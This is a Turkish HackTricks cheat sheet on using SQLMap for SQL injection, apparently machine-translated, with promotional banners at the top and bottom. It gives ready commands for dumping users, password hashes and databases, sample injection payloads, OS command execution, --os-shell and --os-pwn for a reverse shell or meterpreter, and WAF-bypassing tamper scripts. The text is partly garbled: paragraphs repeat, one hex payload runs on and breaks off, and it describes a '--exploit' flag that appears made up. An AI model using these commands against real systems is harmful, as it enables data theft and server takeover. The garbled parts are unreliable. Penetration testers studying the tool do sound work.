26 KiB
AWS hackleme becerilerini sıfırdan kahraman seviyesine kadar öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARI'na göz atın!
- Resmi PEASS & HackTricks ürünlerini edinin
- The PEASS Ailesi'ni keşfedin, özel NFT'lerimiz koleksiyonumuz
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'u takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.
SQLmap için temel argümanlar
Genel
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY
Bilgi Al
İçerik
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
DB verileri
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 8316=8316
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 8316 FROM(SELECT COUNT(*),CONCAT(0x717a6a7071,(SELECT (ELT(8316=8316,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8316 FROM (SELECT(SLEEP(5)))a)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=-9999 UNION ALL SELECT NULL,CONCAT(0x717a6a7071,0x4e4e4e4e4e546d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4e6d4e4e4e4e4
```bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
Enjeksiyon Yeri
Burp/ZAP Yakalamadan
İsteği yakalayın ve req.txt adında bir dosya oluşturun
sqlmap -r req.txt --current-user
GET İstek Enjeksiyonu
SQLMap
SQLMap, SQL enjeksiyonu saldırılarını otomatik olarak tespit etmek ve bu saldırıları gerçekleştirmek için kullanılan popüler bir araçtır. SQLMap, hedef web uygulamasının GET isteklerine SQL enjeksiyonu yapmak için kullanılabilir.
SQLMap ile GET İstek Enjeksiyonu
SQLMap'i kullanarak GET isteklerine SQL enjeksiyonu yapmak için aşağıdaki adımları izleyebilirsiniz:
-
SQLMap'i çalıştırın ve hedef URL'yi belirtin:
sqlmap -u "http://example.com/page.php?id=1"
-
SQLMap, hedef URL'yi analiz edecek ve SQL enjeksiyonu açıklarını tespit etmek için otomatik olarak testler yapacaktır.
-
SQLMap, hedef URL'de SQL enjeksiyonu açığı tespit ederse, size bu açığı kullanmak için seçenekler sunacaktır. Örneğin, veritabanı tablolarını listeleyebilir, verileri çekebilir veya hatta komutları yürütebilirsiniz.
-
SQLMap, hedef URL'de SQL enjeksiyonu açığı tespit etmezse, farklı parametrelerle deneme yapabilir veya manuel olarak SQL enjeksiyonu yapmak için diğer araçları kullanabilirsiniz.
Örnek
Aşağıdaki örnek, SQLMap'i kullanarak GET isteklerine SQL enjeksiyonu yapmayı göstermektedir:
sqlmap -u "http://example.com/page.php?id=1" --dbs
Bu komut, hedef URL'deki veritabanı tablolarını listeleyecektir.
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
POST İstek Enjeksiyonu
When performing a POST request injection, you need to identify the parameters that are being sent in the body of the request. These parameters can be found in the request payload or in the form data.
POST istek enjeksiyonu yaparken, isteğin gövdesinde gönderilen parametreleri belirlemeniz gerekmektedir. Bu parametreler istek yükünde veya form verilerinde bulunabilir.
To inject SQL code into a POST request, you can use tools like SQLMap. SQLMap is a powerful tool that automates the process of detecting and exploiting SQL injection vulnerabilities.
POST isteğine SQL kodu enjekte etmek için SQLMap gibi araçları kullanabilirsiniz. SQLMap, SQL enjeksiyon açıklarını tespit etme ve sömürme sürecini otomatikleştiren güçlü bir araçtır.
To use SQLMap with a POST request, you need to provide the URL of the target, the parameter to be injected, and the payload to be used. SQLMap will then analyze the response and determine if the parameter is vulnerable to SQL injection.
SQLMap'i bir POST isteğiyle kullanmak için, hedefin URL'sini, enjekte edilecek parametreyi ve kullanılacak yükü sağlamanız gerekmektedir. SQLMap, ardından yanıtı analiz edecek ve parametrenin SQL enjeksiyonuna karşı savunmasız olup olmadığını belirleyecektir.
Here is an example command to use SQLMap with a POST request:
İşte bir POST isteğiyle SQLMap kullanmak için bir örnek komut:
sqlmap -u "http://example.com/login" --data "username=admin&password=pass" -p "username" --method POST
In this example, we are targeting the login page of "http://example.com" and injecting the "username" parameter. The payload is provided in the --data
option, where we specify the values for the "username" and "password" parameters.
Bu örnekte, "http://example.com" adresindeki giriş sayfasını hedef alıyoruz ve "username" parametresine enjeksiyon yapıyoruz. Yük, --data
seçeneğinde sağlanır ve "username" ve "password" parametreleri için değerleri belirtiriz.
By using SQLMap, you can automate the process of injecting SQL code into POST requests and quickly identify any SQL injection vulnerabilities in the target application.
SQLMap kullanarak, SQL kodunu POST isteklerine enjekte etme sürecini otomatikleştirebilir ve hedef uygulamadaki SQL enjeksiyon açıklarını hızlı bir şekilde tespit edebilirsiniz.
sqlmap -u "http://example.com" --data "username=*&password=*"
Başlık ve Diğer HTTP Metotlarında Enjeksiyonlar
HTTP Başlıklarında Enjeksiyon
Bazı durumlarda, web uygulamaları HTTP başlıklarını kullanarak veri alışverişi yapar. Bu başlıklar, kullanıcıdan gelen verileri almak veya sunucuya göndermek için kullanılır. SQL enjeksiyonu gibi saldırılar, bu başlıkların güvenli olmadığı durumlarda gerçekleştirilebilir.
SQL enjeksiyonu için kullanılan bazı başlıklar şunlardır:
- User-Agent
- Referer
- Cookie
- Accept-Language
- Accept-Encoding
Bu başlıkların içeriği, sunucu tarafında işlenirken, kullanıcı tarafından kontrol edilebilir. Bu nedenle, bu başlıklara yapılan enjeksiyonlar, saldırganın SQL kodunu sunucuya göndermesine olanak tanır.
Diğer HTTP Metotlarında Enjeksiyon
HTTP protokolü, GET ve POST dışında da birçok farklı metot sunar. Bu metotlar, web uygulamalarının farklı işlemleri gerçekleştirmesine olanak tanır. SQL enjeksiyonu gibi saldırılar, bu metotların güvenli olmadığı durumlarda gerçekleştirilebilir.
SQL enjeksiyonu için kullanılan bazı HTTP metotları şunlardır:
- PUT
- DELETE
- OPTIONS
- TRACE
Bu metotlar, sunucuya veri göndermek veya sunucudan veri almak için kullanılır. Saldırgan, bu metotları kullanarak SQL kodunu sunucuya enjekte edebilir ve istediği işlemi gerçekleştirebilir.
SQLMap ile Enjeksiyon Tespiti
SQLMap, otomatik bir SQL enjeksiyon aracıdır. Bu araç, web uygulamalarında SQL enjeksiyonu açıklarını tespit etmek ve saldırıları gerçekleştirmek için kullanılır. SQLMap, farklı HTTP metotlarında ve başlıklarda enjeksiyonları tespit etmek için kullanılabilir.
SQLMap kullanarak enjeksiyon tespiti yapmak için aşağıdaki komutu kullanabilirsiniz:
sqlmap -u <URL> --method <HTTP_METODU> --headers "<BAŞLIKLAR>"
Bu komutu kullanarak SQLMap'i belirli bir URL, HTTP metodu ve başlıklarla çalıştırabilirsiniz. SQLMap, enjeksiyon tespiti yapmak için otomatik olarak SQL sorguları oluşturacak ve sonuçları analiz edecektir.
SQLMap, enjeksiyon tespiti yaparken dikkatli olunması gereken bir araçtır. Yasal izinlerle ve etik kurallara uygun olarak kullanılmalıdır.
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'
İkinci derece enjeksiyon
Second order injection, bir web uygulamasında SQL enjeksiyonu saldırısının gerçekleştirildiği bir senaryodur. Bu saldırı türünde, kullanıcı tarafından sağlanan verilerin doğrudan SQL sorgularına enjekte edilmediği, ancak verilerin bir veritabanına kaydedildiği ve daha sonra başka bir sorguda kullanıldığı durumlar hedef alınır.
Bu saldırı türü, web uygulamasının güvenlik kontrollerini aşmak için kullanılır. İkinci derece enjeksiyon saldırısı gerçekleştirmek için, saldırgan öncelikle kullanıcı tarafından sağlanan verilerin nasıl işlendiğini ve depolandığını anlamalıdır. Ardından, saldırgan, veritabanına kaydedilen verilerin bir sonraki sorguda nasıl kullanıldığını belirlemek için bu verileri izlemelidir.
İkinci derece enjeksiyon saldırıları, saldırganın veritabanında saklanan verileri manipüle etmesine ve hedef uygulamada istenmeyen işlemler gerçekleştirmesine olanak tanır. Bu tür bir saldırı, veritabanı tablolarını değiştirmek, verileri silmek veya çalmak, hatta sistemde komut çalıştırmak gibi ciddi sonuçlara yol açabilir.
Saldırganlar, ikinci derece enjeksiyon saldırılarını gerçekleştirmek için SQL enjeksiyon araçlarından yararlanabilirler. Bu araçlar, saldırganlara hedef uygulamada ikinci derece enjeksiyon açıklarını tespit etmek ve sömürmek için gerekli olan otomatik işlevleri sağlar.
İkinci derece enjeksiyon saldırılarına karşı korunmak için, web uygulamalarının kullanıcı tarafından sağlanan verileri doğru bir şekilde işlemesi ve güvenlik kontrolleri uygulaması önemlidir. Verilerin doğru bir şekilde filtrelenmesi ve parametrelerin yerine geçirilmesi, ikinci derece enjeksiyon saldırılarının önlenmesine yardımcı olabilir. Ayrıca, güncel güvenlik yamalarının uygulanması ve güvenlik testlerinin düzenli olarak yapılması da önemlidir.
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
Kabuk
SQLMap, hedef web uygulamasında SQL enjeksiyonu saldırılarını otomatik olarak gerçekleştirmek için kullanılan bir araçtır. SQLMap, hedef uygulamada SQL enjeksiyonu açıklarını tespit etmek ve bu açıkları kullanarak veritabanına erişim sağlamak için kullanılır.
SQLMap, bir hedef web uygulamasına saldırmak için çeşitli teknikler kullanır. Bu teknikler arasında UNION tabanlı saldırılar, Boolean tabanlı saldırılar, zaman tabanlı saldırılar ve diğerleri bulunur. SQLMap, hedef uygulamada SQL enjeksiyonu açığı tespit edildiğinde, otomatik olarak uygun saldırı tekniklerini kullanarak veritabanına erişim sağlar.
SQLMap, hedef uygulamada SQL enjeksiyonu açığı tespit etmek için çeşitli yöntemler kullanır. Bu yöntemler arasında otomatik tarama, manuel tarama ve tam tarama bulunur. SQLMap, hedef uygulamada SQL enjeksiyonu açığı tespit ettiğinde, kullanıcıya veritabanına erişim sağlamak için bir kabuk sunar.
SQLMap kabuğu, kullanıcının hedef veritabanında SQL sorgularını çalıştırmasına olanak tanır. Bu kabuk, kullanıcının veritabanında veri okumasını, veri yazmasını ve hatta veritabanını tamamen kontrol etmesini sağlar. SQLMap kabuğu, kullanıcının hedef veritabanında istediği işlemleri gerçekleştirmesine olanak tanır.
SQLMap kabuğu, kullanıcının hedef veritabanında SQL sorgularını çalıştırmasına olanak tanır. Bu kabuk, kullanıcının veritabanında veri okumasını, veri yazmasını ve hatta veritabanını tamamen kontrol etmesini sağlar. SQLMap kabuğu, kullanıcının hedef veritabanında istediği işlemleri gerçekleştirmesine olanak tanır.
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
SQLmap ile bir web sitesini tarama ve otomatik olarak saldırı gerçekleştirme
SQLmap, SQL enjeksiyonu saldırılarını otomatik olarak gerçekleştirmek için kullanılan bir araçtır. Bu araç, hedef web sitesini tarayarak SQL enjeksiyonu açıklarını tespit eder ve otomatik olarak saldırı gerçekleştirir.
SQLmap'ı kullanarak bir web sitesini taramak ve otomatik olarak saldırı gerçekleştirmek için aşağıdaki adımları izleyebilirsiniz:
-
SQLmap'ı çalıştırın ve hedef web sitesinin URL'sini belirtin:
sqlmap -u <hedef-URL>
-
SQLmap, hedef web sitesini tarayacak ve SQL enjeksiyonu açıklarını tespit edecektir. Bu işlem biraz zaman alabilir.
-
SQLmap, tespit edilen SQL enjeksiyonu açıklarını otomatik olarak saldırıya dönüştürebilir. Saldırıyı gerçekleştirmek için aşağıdaki komutu kullanın:
sqlmap -u <hedef-URL> --exploit
-
SQLmap, hedef web sitesine SQL enjeksiyonu saldırısı gerçekleştirerek veritabanına erişmeye çalışacaktır. Başarılı bir saldırı durumunda, SQLmap, veritabanındaki bilgileri çekebilir veya değiştirebilir.
Bu adımları izleyerek SQLmap'i kullanarak bir web sitesini tarama ve otomatik olarak saldırı gerçekleştirme işlemini gerçekleştirebilirsiniz. Ancak, bu tür saldırıları yalnızca yasal ve etik sınırlar içinde gerçekleştirmeniz önemlidir.
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
Bir ek sonek belirleme
Bazı durumlarda, SQL enjeksiyonu saldırısını özelleştirmek isteyebilirsiniz. SQLMap, bu amaçla bir dizi seçenek sunar. Bunlardan biri, enjeksiyonu hedef URL'ye bir ek sonek ekleyerek gerçekleştirir.
Bu seçeneği kullanmak için, --suffix
parametresini kullanarak bir sonek belirlemeniz gerekmektedir. Örneğin, --suffix=' UNION SELECT NULL, NULL, NULL--
şeklinde bir sonek belirleyebilirsiniz.
Bu sonek, SQLMap tarafından enjeksiyonu gerçekleştirmek için kullanılan SQL ifadesine eklenir. Bu sayede, hedef uygulama üzerinde daha fazla kontrol sağlayabilirsiniz.
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
Önek
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
Boolean enjeksiyonunu bulmaya yardım
Boolean enjeksiyonu, bir web uygulamasında SQL enjeksiyonu saldırısı gerçekleştirmek için kullanılan bir tekniktir. Bu saldırıda, uygulamanın SQL sorgularında mantıksal ifadelerin sonuçlarını kontrol etmek için kullanılan boolean (doğru/yanlış) değerlerini manipüle etmek amaçlanır.
Boolean enjeksiyonunu bulmak için aşağıdaki adımları izleyebilirsiniz:
- Uygulamanın giriş alanlarını ve parametrelerini belirleyin.
- Giriş alanlarına veya parametrelerine mantıksal ifadeler ekleyin ve sonuçları gözlemleyin.
- Eğer uygulama hata mesajları veya farklı davranışlar döndürüyorsa, bu durumları analiz edin ve mantıksal ifadelerin sonuçlarını manipüle etmek için kullanabileceğiniz ipuçlarını arayın.
- Boolean enjeksiyonu için SQLMap gibi otomatik araçları kullanabilirsiniz. Bu araçler, uygulamanın SQL sorgularını otomatik olarak analiz eder ve boolean enjeksiyonu için uygun parametreleri tespit eder.
Boolean enjeksiyonu, web uygulamalarında yaygın bir güvenlik açığıdır ve saldırganlara veritabanı bilgilerine erişim sağlama veya yetkisiz veri çekme gibi tehlikeli eylemler gerçekleştirme imkanı verir. Bu nedenle, web uygulamalarınızı güvende tutmak için düzenli olarak güvenlik testleri yapmanız önemlidir.
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
Açıklama:
SQLMap, SQL enjeksiyon saldırılarını gerçekleştirmek için kullanılan bir araçtır. SQLMap, hedef web uygulamasının SQL enjeksiyon açıklarını otomatik olarak tespit eder ve bu açıkları kullanarak veritabanına erişim sağlar. SQLMap, hedef web uygulamasının veritabanına sızma yeteneğine sahip olduğu için oldukça güçlü bir araçtır.
SQLMap, SQL enjeksiyon saldırılarını gerçekleştirmek için çeşitli teknikler kullanır. Bu tekniklerden biri de "tamper" olarak adlandırılır. Tamper, SQLMap'in saldırıları gerçekleştirirken SQL sorgularını değiştirmesine olanak tanır. Bu, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına ve daha etkili bir şekilde veritabanına erişim sağlamasına yardımcı olur.
SQLMap'in tamper özelliği, SQL sorgularını değiştirmek için çeşitli teknikler sunar. Bu teknikler, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına yardımcı olur. Örneğin, SQLMap, SQL sorgularını karıştırabilir, boşlukları kaldırabilir, komutları değiştirebilir veya sorguları şifreleyebilir. Bu teknikler, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına ve veritabanına erişim sağlamasına yardımcı olur.
SQLMap'in tamper özelliği, SQL enjeksiyon saldırılarını gerçekleştirirken kullanılabilir. Bu özellik, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına ve veritabanına erişim sağlamasına yardımcı olur. Tamper, SQLMap'in saldırıları gerçekleştirirken SQL sorgularını değiştirmesine olanak tanır. Bu, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına ve daha etkili bir şekilde veritabanına erişim sağlamasına yardımcı olur.
Kullanım:
Tamper özelliğini kullanmak için, SQLMap komutuna --tamper
parametresini eklemeniz gerekmektedir. Bu parametre, SQLMap'e hangi tamper tekniklerini kullanması gerektiğini belirtir. Örneğin:
sqlmap -u "http://example.com/vuln.php?id=1" --tamper=space2comment
Bu komut, SQLMap'in space2comment
tamper tekniğini kullanarak SQL sorgularını değiştirmesini sağlar. Bu teknik, SQL sorgularındaki boşlukları yorumlara dönüştürerek güvenlik önlemlerini atlamaya yardımcı olur.
Tamper özelliği, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına yardımcı olur. Bu özellik, SQLMap'in saldırıları gerçekleştirirken SQL sorgularını değiştirmesine olanak tanır. Bu, SQLMap'in hedef web uygulamasının güvenlik önlemlerini atlamasına ve daha etkili bir şekilde veritabanına erişim sağlamasına yardımcı olur.
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
Tamper | Açıklama |
---|---|
apostrophemask.py | Apostrof karakterini UTF-8 tam genişlikli karşılığıyla değiştirir |
apostrophenullencode.py | Apostrof karakterini yasaklı çift unicode karşılığıyla değiştirir |
appendnullbyte.py | Kodun sonuna kodlanmış NULL bayt karakteri ekler |
base64encode.py | Verilen koddaki tüm karakterleri Base64'e dönüştürür |
between.py | Büyük olan operatörü '>' 'NOT BETWEEN 0 AND #' ile değiştirir |
bluecoat.py | SQL ifadesinden sonra boşluk karakterini geçerli bir rastgele boş karakterle değiştirir. Ardından karakteri '=' ile LIKE operatörüyle değiştirir |
chardoubleencode.py | Verilen kodun tüm karakterlerini çift url-kodlar zaten kodlanmış olanları işlemlemez |
commalesslimit.py | 'LIMIT M, N' gibi örnekleri 'LIMIT N OFFSET M' ile değiştirir |
commalessmid.py | 'MID(A, B, C)' gibi örnekleri 'MID(A FROM B FOR C)' ile değiştirir |
concat2concatws.py | 'CONCAT(A, B)' gibi örnekleri 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' ile değiştirir |
charencode.py | Verilen kodun tüm karakterlerini url-kodlar zaten kodlanmış olanları işlemlemez |
charunicodeencode.py | Verilen kodun kodlanmamış karakterlerini unicode-url-kodlar zaten kodlanmış olanları işlemlemez . "%u0022" |
charunicodeescape.py | Verilen kodun kodlanmamış karakterlerini unicode-url-kodlar zaten kodlanmış olanları işlemlemez . "\u0022" |
equaltolike.py | Tüm eşitlik operatörü '=' örneklerini 'LIKE' operatörüyle değiştirir |
escapequotes.py | Tırnak işaretlerini ' ve " kaçış karakteriyle değiştirir |
greatest.py | Büyük olan operatörü '>' 'GREATEST' karşılığıyla değiştirir |
halfversionedmorekeywords.py | Her anahtar kelimenin önüne sürüm bilgisi ekler |
ifnull2ifisnull.py | 'IFNULL(A, B)' gibi örnekleri 'IF(ISNULL(A), B, A)' ile değiştirir |
modsecurityversioned.py | Tam sorguyu sürümlendirilmiş yorumla kapsar |
modsecurityzeroversioned.py | Tam sorguyu sıfır sürümlü yorumla kapsar |
multiplespaces.py | SQL anahtar kelimelerinin etrafına birden fazla boşluk ekler |
nonrecursivereplacement.py | Değiştirme için uygun temsilcilerle önceden tanımlanmış SQL anahtar kelimelerini değiştirir (örneğin .replace("SELECT", "")) |
percentage.py | Her karakterin önüne bir yüzde işareti '%' ekler |
overlongutf8.py | Verilen kodun tüm karakterlerini dönüştürür zaten kodlanmış olanları işlemlemez |
randomcase.py | Her anahtar kelime karakterini rastgele bir büyük/küçük harf değeriyle değiştirir |
randomcomments.py | SQL anahtar kelimelerine rastgele yorumlar ekler |
securesphere.py | Özel oluşturulmuş bir dize ekler |
sp_password.py | Otomatik olarak gizlenmek için kodun sonuna 'sp_password' ekler |
space2comment.py | Boşluk karakterini ' ' yorumlarla değiştirir |
space2dash.py | Boşluk karakterini ' ' tire yorumu '--' ile değiştirir ve ardından rastgele bir dize ve yeni satır '\n' ekler |
space2hash.py | Boşluk karakterini ' ' bir diyez karakteri '\#' ile değiştirir ve ardından rastgele bir dize ve yeni satır '\n' ekler |
space2morehash.py | Boşluk karakterini ' ' bir diyez karakteri '\#' ile değiştirir ve ardından rastgele bir dize ve yeni satır '\n' ekler |
space2mssqlblank.py | Boşluk karakterini ' ' geçerli bir alternatif karakter kümesinden rastgele bir boş karakterle değiştirir |
space2mssqlhash.py | Boşluk karakterini ' ' bir diyez karakteri '\#' ile değiştirir ve ardından yeni satır '\n' ekler |
space2mysqlblank.py | Boşluk karakterini ' ' geçerli bir alternatif karakter kümesinden rastgele bir boş karakterle değiştirir |
space2mysqldash.py | Boşluk karakterini ' ' tire yorumu '--' ile değiştirir ve ardından yeni satır '\n' ekler |
space2plus.py | Boşluk karakterini ' ' artı işareti '+' ile değiştirir |
space2randomblank.py | Boşluk karakterini ' ' geçerli bir alternatif karakter kümesinden rastgele bir boş karakterle değiştirir |
symboliclogical.py | AND ve OR mantıksal operatörlerini sembolik karşılıklarıyla (&& ve |
unionalltounion.py | UNION ALL SELECT ifadesini UNION SELECT ile değiştirir |
unmagicquotes.py | Tırnak işaretini ' çoklu baytlı bir kombinasyon %bf%27 ile değiştirir ve sonuna genel bir yorum ekler çalışması için |
uppercase.py | Her anahtar kelime karakterini büyük harf değeriyle değiştirir 'INSERT' |
varnish.py | Bir HTTP başlığı 'X-originating-IP' ekler |
versionedkeywords.py | Her işlev olmayan anahtar kelimeyi sürümlendirilmiş MySQL yorumuyla çevreler |
versionedmorekeywords.py | Her anahtar kelimeyi sürümlendirilmiş MySQL yorumuyla çevreler |
xforwardedfor.py | Sahte bir HTTP başlığı 'X-Forwarded-For' ekler |
AWS hackleme konusunda sıfırdan kahramana kadar öğrenin htARTE (HackTricks AWS Red Team Expert) ile!
HackTricks'ı desteklemenin diğer yolları:
- Şirketinizi HackTricks'te reklam vermek veya HackTricks'i PDF olarak indirmek için ABONELİK PLANLARINI kontrol edin!
- Resmi PEASS & HackTricks ürünlerini edinin
- Özel NFT'lerden oluşan koleksiyonumuz The PEASS Family'yi keşfedin
- 💬 Discord grubuna veya telegram grubuna katılın veya Twitter 🐦 @carlospolopm'u takip edin.
- Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın.